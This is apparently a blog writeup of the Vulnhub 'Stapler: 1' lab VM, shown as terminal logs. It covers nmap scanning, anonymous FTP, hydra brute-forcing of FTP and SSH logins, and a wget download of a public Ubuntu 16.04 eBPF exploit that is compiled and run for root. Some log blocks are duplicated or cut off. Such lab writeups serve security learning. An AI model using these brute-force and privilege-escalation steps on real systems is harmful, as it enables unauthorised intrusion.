292 lines
11 KiB
Markdown
292 lines
11 KiB
Markdown
---
|
||
title: "Stapler: 1 Vulnhub Walkthrough"
|
||
layout: post
|
||
category: writeup
|
||
tags: [vulnhub, hacking]
|
||
excerpt: "Walkthrough for Stapler: 1 VM on Vulnhub"
|
||
---
|
||
|
||
# Figure out the IP
|
||
|
||
```
|
||
paul@archyoga [05:31:55] [~]
|
||
-> % nmap -sn 192.168.1.0/24
|
||
|
||
Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-19 17:32 EDT
|
||
.
|
||
.
|
||
.
|
||
Nmap scan report for red (192.168.1.135)
|
||
Host is up (0.0030s latency).
|
||
.
|
||
.
|
||
.
|
||
Nmap done: 256 IP addresses (16 hosts up) scanned in 3.59 seconds
|
||
```
|
||
|
||
Let's see what's there:
|
||
|
||
```
|
||
paul@archyoga [05:33:59] [~]
|
||
-> % nmap -Pn 192.168.1.135
|
||
|
||
Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-19 17:34 EDT
|
||
Nmap scan report for red (192.168.1.135)
|
||
Host is up (0.011s latency).
|
||
Not shown: 992 filtered ports
|
||
PORT STATE SERVICE
|
||
20/tcp closed ftp-data
|
||
21/tcp open ftp
|
||
22/tcp open ssh
|
||
53/tcp open domain
|
||
80/tcp open http
|
||
139/tcp open netbios-ssn
|
||
666/tcp open doom
|
||
3306/tcp open mysql
|
||
|
||
Nmap done: 1 IP address (1 host up) scanned in 4.86 seconds
|
||
```
|
||
|
||
# Login to ftp
|
||
|
||
```
|
||
paul@archyoga [05:34:57] [~]
|
||
-> % ftp
|
||
ftp> open 192.168.1.135
|
||
Connected to 192.168.1.135.
|
||
220-
|
||
220-|-----------------------------------------------------------------------------------------|
|
||
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
|
||
220-|-----------------------------------------------------------------------------------------|
|
||
220-
|
||
220
|
||
Name (192.168.1.135:paul): anonymous
|
||
331 Please specify the password.
|
||
Password:
|
||
230 Login successful.
|
||
Remote system type is UNIX.
|
||
Using binary mode to transfer files.
|
||
ftp> ls
|
||
200 PORT command successful. Consider using PASV.
|
||
150 Here comes the directory listing.
|
||
-rw-r--r-- 1 0 0 107 Jun 03 23:06 note
|
||
226 Directory send OK.
|
||
ftp> get note
|
||
200 PORT command successful. Consider using PASV.
|
||
150 Opening BINARY mode data connection for note (107 bytes).
|
||
226 Transfer complete.
|
||
107 bytes received in 5.1e-05 seconds (2 Mbytes/s)
|
||
ftp> 221 Goodbye.
|
||
|
||
paul@archyoga [05:36:17] [~]
|
||
-> % cat note
|
||
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
|
||
```
|
||
|
||
Turns out it is, and inside is a file named ```note``` which names an ftp user: ```elly```.
|
||
I used hydra to test some common passwords and that worked out:
|
||
|
||
```
|
||
paul@archyoga [05:39:21] [~]
|
||
-> % hydra -l elly -e nsr 92.168.1.135 ftp
|
||
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
|
||
|
||
Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-19 17:39:36
|
||
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
|
||
[DATA] max 3 tasks per 1 server, overall 64 tasks, 3 login tries (l:1/p:3), ~0 tries per task
|
||
[DATA] attacking service ftp on port 21
|
||
[21][ftp] host: 192.168.1.135 login: elly password: ylle
|
||
1 of 1 target successfully completed, 1 valid password found
|
||
Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-19 17:39:50
|
||
```
|
||
|
||
Now we can login to ftp as elly using the password ```ylle```. On the ftp server there's a passwd file, so I can use that as a user list to test against:
|
||
|
||
```
|
||
paul@archyoga [05:42:07] [~]
|
||
-> % ftp
|
||
ftp> open 192.168.1.135
|
||
Connected to 192.168.1.135.
|
||
220-
|
||
220-|-----------------------------------------------------------------------------------------|
|
||
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
|
||
220-|-----------------------------------------------------------------------------------------|
|
||
220-
|
||
220
|
||
Name (192.168.1.135:paul): elly
|
||
331 Please specify the password.
|
||
Password:
|
||
230 Login successful.
|
||
Remote system type is UNIX.
|
||
Using binary mode to transfer files.
|
||
ftp> ls
|
||
200 PORT command successful. Consider using PASV.
|
||
150 Here comes the directory listing.
|
||
.
|
||
.
|
||
.
|
||
-rw-r--r-- 1 0 0 2908 Jun 04 20:14 passwd
|
||
.
|
||
.
|
||
.
|
||
ftp> get passwd
|
||
200 PORT command successful. Consider using PASV.
|
||
150 Opening BINARY mode data connection for passwd (2908 bytes).
|
||
226 Transfer complete.
|
||
2908 bytes received in 9.9e-05 seconds (28 Mbytes/s)
|
||
ftp> 221 Goodbye.
|
||
```
|
||
|
||
# Login over ssh & exploit
|
||
|
||
Using hydra again I discovered a login for ssh from the passwd file:
|
||
|
||
```
|
||
paul@archyoga [05:42:36] [~]
|
||
-> % awk -F':' '{ print $1}' passwd > users
|
||
|
||
|
||
-> % hydra -e nsr -L ./users 192.168.1.135 ssh
|
||
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
|
||
|
||
Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-19 17:44:42
|
||
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
|
||
[DATA] max 16 tasks per 1 server, overall 64 tasks, 183 login tries (l:61/p:3), ~0 tries per task
|
||
[DATA] attacking service ssh on port 22
|
||
[22][ssh] host: 192.168.1.135 login: SHayslett password: SHayslett
|
||
```
|
||
|
||
Then once I determined the release I went over to [http://exploit-db.com](http://exploit-db.com) and searched "ubuntu 16.04" and found this: https://www.exploit-db.com/exploits/39772/
|
||
|
||
Now for the exploit:
|
||
|
||
```
|
||
paul@archyoga [05:50:44] [~]
|
||
-> % ssh SHayslett@192.168.1.135
|
||
-----------------------------------------------------------------
|
||
~ Barry, don't forget to put a message here ~
|
||
-----------------------------------------------------------------
|
||
SHayslett@192.168.1.135's password:
|
||
Welcome back!
|
||
|
||
|
||
SHayslett@red:~$ lsb_release -a
|
||
No LSB modules are available.
|
||
Distributor ID: Ubuntu
|
||
Description: Ubuntu 16.04 LTS
|
||
Release: 16.04
|
||
Codename: xenial
|
||
SHayslett@red:~$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
|
||
--2016-06-19 18:49:36-- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
|
||
Resolving github.com (github.com)... 192.30.252.130
|
||
Connecting to github.com (github.com)|192.30.252.130|:443... connected.
|
||
HTTP request sent, awaiting response... 302 Found
|
||
Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip [following]
|
||
--2016-06-19 18:49:36-- https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip
|
||
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 23.235.44.133
|
||
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|23.235.44.133|:443... connected.
|
||
HTTP request sent, awaiting response... 200 OK
|
||
Length: 7115 (6.9K) [application/zip]
|
||
Saving to: ‘39772.zip’
|
||
|
||
39772.zip 100%[=====================================================================================================================================================================================================>] 6.95K --.-KB/s in 0s
|
||
|
||
2016-06-19 18:49:37 (94.2 MB/s) - ‘39772.zip’ saved [7115/7115]
|
||
|
||
SHayslett@red:~/tmp$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/splo
|
||
--2016-06-19 18:52:05-- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploi
|
||
Resolving github.com (github.com)... 192.30.252.128
|
||
Connecting to github.com (github.com)|192.30.252.128|:443... connected.
|
||
HTTP request sent, awaiting response... 302 Found
|
||
Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/3
|
||
--2016-06-19 18:52:05-- https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/m
|
||
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 23.235.46.133
|
||
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|23.235.46.133|:443... connected.
|
||
HTTP request sent, awaiting response... 200 OK
|
||
Length: 7115 (6.9K) [application/zip]
|
||
Saving to: ‘39772.zip’
|
||
|
||
39772.zip 100%[=======================
|
||
|
||
2016-06-19 18:52:05 (4.75 MB/s) - ‘39772.zip’ saved [7115/7115]
|
||
|
||
SHayslett@red:~/tmp$ unzip *
|
||
Archive: 39772.zip
|
||
creating: 39772/
|
||
.
|
||
.
|
||
.
|
||
SHayslett@red:~/tmp$ cd *2
|
||
SHayslett@red:~/tmp/39772$ ls
|
||
crasher.tar exploit.tar
|
||
SHayslett@red:~/tmp/39772$ tar xf exploit.tar
|
||
SHayslett@red:~/tmp/39772$ ls
|
||
crasher.tar ebpf_mapfd_doubleput_exploit exploit.tar
|
||
SHayslett@red:~/tmp/39772$ cd e*
|
||
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
|
||
compile.sh doubleput.c hello.c suidhelper.c
|
||
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
|
||
doubleput.c: In function ‘make_setuid’:
|
||
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
|
||
.insns = (__aligned_u64) insns,
|
||
^
|
||
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
|
||
.license = (__aligned_u64)""
|
||
^
|
||
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
|
||
compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c
|
||
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
|
||
starting writev
|
||
woohoo, got pointer reuse
|
||
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
|
||
suid file detected, launching rootshell...
|
||
we have root privs now...
|
||
root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root
|
||
SHayslett@red:~/tmp/39772$ cd e*
|
||
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
|
||
compile.sh doubleput.c hello.c suidhelper.c
|
||
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
|
||
doubleput.c: In function ‘make_setuid’:
|
||
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
|
||
.insns = (__aligned_u64) insns,
|
||
^
|
||
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
|
||
.license = (__aligned_u64)""
|
||
^
|
||
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
|
||
compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c
|
||
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
|
||
starting writev
|
||
woohoo, got pointer reuse
|
||
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
|
||
suid file detected, launching rootshell...
|
||
we have root privs now...
|
||
root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit#
|
||
```
|
||
|
||
This part might be a little hard to read, but all I did was follow the instructions from the exploit page pretty much word for word: https://www.exploit-db.com/exploits/39772/.
|
||
|
||
Next, the flag!
|
||
|
||
```
|
||
root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root
|
||
root@red:/root# ls
|
||
fix-wordpress.sh flag.txt issue python.sh wordpress.sql
|
||
root@red:/root# cat flag.txt
|
||
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
|
||
.-'''''-.
|
||
|'-----'|
|
||
|-.....-|
|
||
| |
|
||
| |
|
||
_,._ | |
|
||
__.o` o`"-. | |
|
||
.-O o `"-.o O )_,._ | |
|
||
( o O o )--.-"`O o"-.`'-----'`
|
||
'--------' ( o O o)
|
||
`----------`
|
||
b6b545dc11b7a270f4bad23432190c75162c4a2b
|
||
```
|
||
|
||
Woo!
|